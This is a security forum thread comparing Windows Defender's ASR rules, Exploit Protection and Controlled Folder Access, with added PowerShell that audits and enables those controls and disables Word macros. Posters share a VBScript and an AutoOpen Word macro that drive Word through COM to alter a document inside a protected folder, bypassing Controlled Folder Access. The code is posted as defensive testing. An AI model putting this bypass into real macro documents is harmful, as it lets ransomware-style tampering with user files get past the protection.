
509322

@Lockdown,
I edited my previous post, because blocking execution via WMI was related to Exploit Protection mitigation "Do not allow child processes", but not to the ASR rule "Block Office applications from creating child processes" (false memory). So, probably your note about direct system calls is also related to this Exploit Protection mitigation.
Microsoft Windows spaghetti protection. If I test, I say a quick prayer before I start so I don't get sucked into the abyss.

Spaghetti protection is OK for researchers and geeks, but for people who rely on it, Oh boy...
 

Andy Ful

Microsoft Windows spaghetti protection. If I test, I say a quick prayer before I start so I don't get sucked into the abyss.
Spaghetti protection is OK for researchers and geeks, but for people who rely on it, Oh boy...
Ha, ha. Windows security is like the spaghetti hidden in the abyss. What can be more interesting for the researcher than abyss?:giggle:
 

Andy Ful

I am curious why the two Windows built-in features related to blocking child processes can work so differently. The ASR rule "Block Office applications from creating child processes" can be easily fooled by execution via WMI, but the Exploit Protection mitigation "Do not allow child processes" cannot (if applied to the MS Office application).
 
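Since the thread compares the two child-process controls without showing how to inspect or set them, here is an added PowerShell example (not code from the thread or from Microsoft) that audits both for winword.exe and enables them. It assumes Windows 10 1709 or later with Microsoft Defender, an elevated session, and the standard Defender and ProcessMitigation cmdlets; the ASR rule GUID is the one published for "Block all Office applications from creating child processes" and should be checked against the current Microsoft reference before deployment.

```powershell
# Added example (not from the thread): audit and enable the two Windows controls
# discussed above for winword.exe. Assumes Windows 10 1709+ with Microsoft Defender
# and an elevated PowerShell session.
$exe    = 'winword.exe'
# GUID of the ASR rule "Block all Office applications from creating child processes"
# (verify against the current Microsoft ASR rule reference before deploying)
$ruleId = 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A'

function Get-OfficeChildProcessControls {
    # ASR rule state: 0 = Disabled, 1 = Block, 2 = Audit; rule absent = not configured
    $pref = Get-MpPreference
    $ids  = @($pref.AttackSurfaceReductionRules_Ids)
    $asr  = 'not configured'
    for ($i = 0; $i -lt $ids.Count; $i++) {
        if ($ids[$i] -ieq $ruleId) { $asr = $pref.AttackSurfaceReductionRules_Actions[$i] }
    }
    # Exploit Protection per-process mitigation (the one that also stopped the WMI launch)
    $mit = Get-ProcessMitigation -Name $exe
    [pscustomobject]@{
        Process              = $exe
        AsrChildProcessRule  = $asr
        EpDisallowChildProcs = $mit.ChildProcess.DisallowChildProcessCreation  # ON / OFF / NOTSET
    }
}

function Enable-OfficeChildProcessControls {
    # Put the ASR rule in Block mode and set the Exploit Protection mitigation for Word.
    # Caveat: DisallowChildProcessCreation also blocks legitimate helpers Word launches
    # (for example opening a hyperlink in the browser), so pilot it before rolling out.
    Add-MpPreference -AttackSurfaceReductionRules_Ids $ruleId `
                     -AttackSurfaceReductionRules_Actions Enabled
    Set-ProcessMitigation -Name $exe -Enable DisallowChildProcessCreation
}

# Show the current state; call Enable-OfficeChildProcessControls to apply both settings
Get-OfficeChildProcessControls
```

Run the audit before and after enabling to confirm the ASR action is 1 and the mitigation reads ON; the thread's observation is that only the second one survives the WMI launch path.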

DeepWeb

Like the CIA once said in one of their leaked documents about AVs, if you can pretend to be a system process, you can do whatever you want on Windows. Meanwhile DEP for all programs is still not enabled by default. Some of the best Exploit Protection mitigation settings should be on by default. I have only seen one or two programs break. Until they redo the kernel and redo permissions and privileges, it will be an eternal cat and mouse game.
 

Andy Ful

Researcher Bypasses Windows Controlled Folder Access Anti-Ransomware Protection

Date: February 6th, 2018.

Nothing has changed. CFA is still weak.
I tested this bypass with all ASR rules activated. Sadly, it succeeded.
Why? Because it uses the Application object (Word), which is built into MS Office Word, and Word can make changes in the folders protected by Controlled Folder Access Anti-Ransomware Protection. The details of the Python code are here (non-malicious):
Microsoft Anti Ransomware bypass (not a vulnerability for Microsoft) ~ Security By Default
I made a VBScript file to do a similar thing. It can delete the first page of a document in the protected Documents folder.
Code:
' Drive Word through COM automation; Word itself is allowed by Controlled Folder Access
Set wrd = CreateObject("Word.Application")
wrd.Documents.Open "C:\Users\User_Name\Documents\Part.docx"
wrd.Visible = False
wrd.ActiveDocument.Bookmarks("\Page").Range.Delete   ' delete the first page
wrd.ActiveDocument.SaveAs ("C:\Users\User_Name\Documents\Part.docx")
wrd.Application.Quit()
 

509322

Yeah, that will do it, for sure. Please tell my boss to stop asking me for Word docs, though...
Microsoft Office is the most polished.

Kingsoft WPS or SoftMaker Pro docs work just fine.

Kingsoft WPS is the closest to Office.

Both have really good inter-compatibility with Microsoft Office.

Screenshots: Word and TextMaker (attachments Cap6.PNG, Cap7.PNG)

There isn't much risk unless you are working with unknown documents. And malicious documents aren't too subtle... they're actually glaring.
 
Last edited by a moderator:

shmu26

Microsoft Office is the most polished.

Kingsoft WPS or SoftMaker Pro docs work just fine.

Kingsoft WPS is the closest to Office.

Both have really good inter-compatibility with Microsoft Office.

Screenshots: Word and TextMaker (attachments)

There isn't much risk unless you are working with unknown documents. And malicious documents aren't too subtle... they're actually glaring.
When someone emails a Word doc that I am probably going to just delete a minute later, I can view it and print it from Outlook Mail Online.
 

509322

When someone emails a Word doc that I am probably going to just delete a minute later, I can view it and print it from Outlook Mail Online.
If you are only opening your own self-created Office documents, then the risk is remote. Not unless you are crafting your own malicious documents and you happen to run one and infect yourself with it.
 

Andy Ful

So this is an example of why one would want some Default-Deny protection when running WD?
I am afraid that this bypass is general for most security solutions with Anti-Ransomware modules. It is not special for Controlled Folder Access. Most Anti-Ransomware will have a problem with MS Office applications, because they are usually excluded from blocking - for example, Word cannot be blocked if you want to save documents in the protected folders.
Today, I will try to test the bypass via the weaponized document in Word 2016 to see how effective the AMSI and ASR mitigations for MS Office are.(y)
 

509322

I am afraid that this bypass is general for most security solutions with Anti-Ransomware modules. It is not special for Controlled Folder Access. Most Anti-Ransomware will have a problem with MS Office applications, because they are usually excluded from blocking - for example, Word cannot be blocked if you want to save documents in the protected folders.
Today, I will try to test the bypass via the weaponized document in Word 2016 to see how effective the AMSI and ASR mitigations for MS Office are.(y)
Office documents should not have access to file vaults. In our product, Microsoft Office is allowed to access the file vaults by default. I tell people to disable Office access. Use copy-paste to the file vault after doing your work. It is so simple and not any kind of objectionable inconvenience. A file vault is exactly that... a place for hardened storage. It is not very good if it allows access.
 

Andy Ful

I tested the below macro against Word 2016 with allowed macros + WD Controlled Folder Access + all ASR rules:
Code:
Sub AutoOpen()
' Runs automatically when the document is opened (only if macros are enabled)
' Attach to the already running Word instance instead of starting a new process
Set wrd = GetObject(, "Word.Application")
wrd.Visible = True
wrd.Documents.Open "C:\Users\User_Name\Documents\Part.docx"
wrd.ActiveDocument.Bookmarks("\Page").Range.Delete   ' delete the first page
wrd.ActiveDocument.SaveAs ("C:\Users\User_Name\Documents\Part.docx")
Set wrd = Nothing
End Sub
The macro can open the document Part.docx, delete the first page, and save the changed document.
This macro bypassed the Controlled Folder Access + all ASR rules + Word hardening (except macros).
Of course it can be blocked when macros are not enabled.
 
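The last post notes that the macro is stopped only when macros are not enabled. As an added example (not from the thread or from Microsoft), the following PowerShell enforces that condition by policy for Word 2016 in the current user's hive; it assumes the Office 16.0 policy path and the VBAWarnings and BlockContentExecutionFromInternet values that the Office Group Policy templates write, and a domain GPO would set the same values.

```powershell
# Added example (not from the thread): enforce "macros disabled" for Word 2016 by policy.
# Policy values under HKCU\Software\Policies override the user's Trust Center choices.
$key = 'HKCU:\Software\Policies\Microsoft\Office\16.0\Word\Security'

function Set-WordMacroPolicy {
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    # VBAWarnings: 1 = enable all, 2 = disable with notification,
    #              3 = disable except digitally signed, 4 = disable all without notification
    Set-ItemProperty -Path $key -Name 'VBAWarnings' -Type DWord -Value 4
    # Block macros in documents carrying Mark-of-the-Web (downloaded or e-mailed files)
    Set-ItemProperty -Path $key -Name 'BlockContentExecutionFromInternet' -Type DWord -Value 1
}

function Get-WordMacroPolicy {
    # Returns the effective policy values, or $null properties if the key is absent
    if (Test-Path $key) {
        Get-ItemProperty -Path $key |
            Select-Object VBAWarnings, BlockContentExecutionFromInternet
    }
}

Set-WordMacroPolicy
Get-WordMacroPolicy
```

Caveat: documents in Trusted Locations still run macros regardless of VBAWarnings, so the Trusted Locations policy for Word needs the same review; restart Word for the change to apply.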